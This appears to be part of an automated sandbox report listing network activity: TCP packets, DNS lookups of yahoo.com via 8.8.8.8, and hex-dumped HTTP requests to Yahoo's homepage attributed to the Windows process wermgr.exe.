                                                                                                                                                                        Jun 2, 2023 13:13:21.326055050 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326067924 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326147079 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326212883 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326224089 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326245070 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326282024 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326298952 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326316118 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326443911 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326519966 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326539993 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326592922 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326596022 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326616049 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.326653004 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.326685905 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.363713980 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.363871098 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.363957882 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364043951 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364115953 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364115953 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364115953 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364155054 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364247084 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364365101 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364368916 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364387989 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364449978 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364473104 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364552021 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364571095 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364658117 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364666939 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364691019 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364738941 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364787102 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364803076 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364891052 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364973068 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.364978075 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.364998102 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365065098 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365106106 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365123034 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365252972 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365330935 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365339041 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365362883 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365416050 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365439892 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365453959 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365571022 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365647078 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365657091 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365680933 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365741968 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365763903 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365833998 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365853071 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.365917921 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.365943909 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366019964 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366033077 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366111040 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366122961 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366194963 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366202116 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366225958 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366272926 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366323948 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366352081 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366485119 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366574049 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366574049 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366600037 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366647959 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366677046 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366693974 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366837978 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366913080 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.366921902 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.366945028 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367002964 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367029905 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367127895 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367146015 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367227077 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367263079 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367280960 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367300987 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367352009 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367367029 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367434978 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367455959 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367522955 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367525101 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367549896 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367587090 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367640972 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367660046 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367748022 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367821932 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367832899 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367857933 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.367913008 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.367943048 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368010044 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368031025 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368098021 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368124962 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368201017 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368212938 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368287086 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368299007 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368376970 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368381977 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368407011 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368463039 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368534088 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368606091 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368624926 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368690014 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368712902 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368782043 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368799925 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368865967 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368885040 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.368951082 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.368969917 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.369059086 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.369075060 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.369146109 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.369163036 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.369235992 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.369242907 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.369689941 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.436578035 CEST49714443192.168.2.487.248.100.215
                                                                                                                                                                        Jun 2, 2023 13:13:21.436626911 CEST4434971487.248.100.215192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.503714085 CEST49715443192.168.2.485.101.239.116
                                                                                                                                                                        Jun 2, 2023 13:13:21.503787994 CEST4434971585.101.239.116192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:21.504086018 CEST49715443192.168.2.485.101.239.116
                                                                                                                                                                        Jun 2, 2023 13:13:21.504383087 CEST49715443192.168.2.485.101.239.116
                                                                                                                                                                        Jun 2, 2023 13:13:21.504412889 CEST4434971585.101.239.116192.168.2.4
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jun 2, 2023 13:13:20.191906929 CEST5557053192.168.2.48.8.8.8
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST53555708.8.8.8192.168.2.4
                                                                                                                                                                        Jun 2, 2023 13:13:20.758934021 CEST6490653192.168.2.48.8.8.8
                                                                                                                                                                        Jun 2, 2023 13:13:20.782234907 CEST53649068.8.8.8192.168.2.4
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Jun 2, 2023 13:13:20.191906929 CEST192.168.2.48.8.8.80x92c7Standard query (0)yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.758934021 CEST192.168.2.48.8.8.80x4511Standard query (0)www.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com74.6.143.25A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com98.137.11.164A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com98.137.11.163A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com74.6.231.20A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com34.225.127.72A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com74.6.143.26A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com74.6.231.21A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.206631899 CEST8.8.8.8192.168.2.40x92c7No error (0)yahoo.com54.161.105.65A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.782234907 CEST8.8.8.8192.168.2.40x4511No error (0)www.yahoo.comnew-fp-shed.wg1.b.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.782234907 CEST8.8.8.8192.168.2.40x4511No error (0)new-fp-shed.wg1.b.yahoo.com87.248.100.215A (IP address)IN (0x0001)false
                                                                                                                                                                        Jun 2, 2023 13:13:20.782234907 CEST8.8.8.8192.168.2.40x4511No error (0)new-fp-shed.wg1.b.yahoo.com87.248.100.216A (IP address)IN (0x0001)false
                                                                                                                                                                        • yahoo.com
                                                                                                                                                                        • www.yahoo.com
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        0192.168.2.44971374.6.143.25443C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        2023-06-02 11:13:20 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                        Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                        Host: yahoo.com
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        2023-06-02 11:13:20 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                        Date: Fri, 02 Jun 2023 11:13:20 GMT
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                        Server: ATS
                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                        Content-Language: en
                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        Location: https://www.yahoo.com/
                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                        2023-06-02 11:13:20 UTC0INData Raw: 72 65 64 69 72 65 63 74
                                                                                                                                                                        Data Ascii: redirect


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        1192.168.2.44971487.248.100.215443C:\Windows\SysWOW64\wermgr.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        2023-06-02 11:13:20 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                        Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Host: www.yahoo.com
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2023-06-02 11:13:21 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                        expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                        strict-transport-security: max-age=31536000
                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                        x-xss-protection: 1; mode=block
                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                        date: Fri, 02 Jun 2023 11:13:21 GMT
                                                                                                                                                                        x-envoy-upstream-service-time: 36
                                                                                                                                                                        server: ATS
                                                                                                                                                                        Age: 1
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: no-store, no-cache, max-age=0, private
                                                                                                                                                                        Expires: -1
                                                                                                                                                                        2023-06-02 11:13:21 UTC1INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                        Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                        2023-06-02 11:13:21 UTC2INData Raw: 65 63 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 64 3d 61 74 6f 6d 69 63 20 63 6c 61 73 73 3d 22 6c 74 72 20 66 70 20 20 64 65 73 6b 74 6f 70 2d 6c 69 74 65 20 20 66 70 2d 6e 6f 6e 65 20 62 6b 74 39 30 30 20 75 61 2d 69 65 20 75 61 2d 31 31 2e 30 22 20 6c 61 6e 67 3d 65 6e 2d 55 53 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 61 72 6b 28 27 50 61 67 65 53 74 61 72 74 27 29 3b
                                                                                                                                                                        Data Ascii: ec6<!doctype html><html id=atomic class="ltr fp desktop-lite fp-none bkt900 ua-ie ua-11.0" lang=en-US data-color-scheme><head><script nonce=b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113> window.performance.mark('PageStart');
                                                                                                                                                                        2023-06-02 11:13:21 UTC3INData Raw: 65 73 73 65 6e 67 65 72 2c 20 79 61 68 6f 6f 20 67 61 6d 65 73 2c 20 6e 65 77 73 2c 20 66 69 6e 61 6e 63 65 2c 20 73 70 6f 72 74 2c 20 65 6e 74 65 72 74 61 69 6e 6d 65 6e 74 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 66 62 3a 61 70 70 5f 69 64 20 63 6f 6e 74 65 6e 74 3d 34 35 38 35 38 34 32 38 38 32 35 37 32 34 31 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 69 6d 61 67 65 20 63 6f 6e 74 65 6e 74 3d 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 73 6f 63 69 61 6c 2f 69 6d 61 67 65 73 2f 79 61 68 6f 6f 5f 64 65 66 61 75 6c 74 5f 6c 6f 67 6f 2e 70 6e 67 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 66 62 3a 70 61 67 65 73 20 63 6f 6e 74 65 6e 74 3d 22 37 30 34 30 37 32 34 37 31 33 2c 20 33 37 35 31
                                                                                                                                                                        Data Ascii: essenger, yahoo games, news, finance, sport, entertainment"><meta property=fb:app_id content=458584288257241><meta property=og:image content=https://s.yimg.com/cv/apiv2/social/images/yahoo_default_logo.png><meta property=fb:pages content="7040724713, 3751
                                                                                                                                                                        2023-06-02 11:13:21 UTC4INData Raw: 2f 67 65 6f 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 71 75 65 72 79 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 67 65 6f 2e 71 75 65 72 79 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f 73 65 61 72 63 68 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 73 65 61 72 63 68 2e 79 61 68 6f 6f 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 2f 2f
                                                                                                                                                                        Data Ascii: /geo.yahoo.com"><link rel="dns-prefetch" href="//geo.query.yahoo.com"><link rel="preconnect" href="//geo.query.yahoo.com"><link rel="dns-prefetch" href="//search.yahoo.com"><link rel="preconnect" href="//search.yahoo.com"><link rel="dns-prefetch" href="//
                                                                                                                                                                        2023-06-02 11:13:21 UTC5INData Raw: 37 66 66 39 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6e 6f 6e 63 65 3d 22 62 33 30 32 35 39 30 33 66 38 34 66 38 64 66 32 33 37 30 63 32 39 38 36 63 33 32 31 36 32 34 63 37 39 66 33 66 38 39 39 32 32 61 34 62 31 30 39 61 30 39 63 64 63 63 39 64 62 66 32 33 31 31 33 22 3e 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 64 72 2f 66 70 2f 63 73 73 2f 66 75 73 69 6f 6e 2e 61 74 6f 6d 69 63 2e 62 36 63 37 64 35 31 30 39 61 30 35 34 33 36 33 64 36 33 64 38 35 64 65 32 36 38 37 38 65 65 63 2e 63 73 73 20 2a 2f 20 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 5c 28 35 30 70 78 5c 29 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 42 67 5c 28 2d 2d 64 69 72 74 79 2d 73 65 61 67 75
                                                                                                                                                                        Data Ascii: 7ff9<style type="text/css" nonce="b3025903f84f8df2370c2986c321624c79f3f89922a4b109a09cdcc9dbf23113">/* https://s.yimg.com/dr/fp/css/fusion.atomic.b6c7d5109a054363d63d85de26878eec.css */ #atomic .Bdrs\(50px\){border-radius:50px}#atomic .Bg\(--dirty-seagu
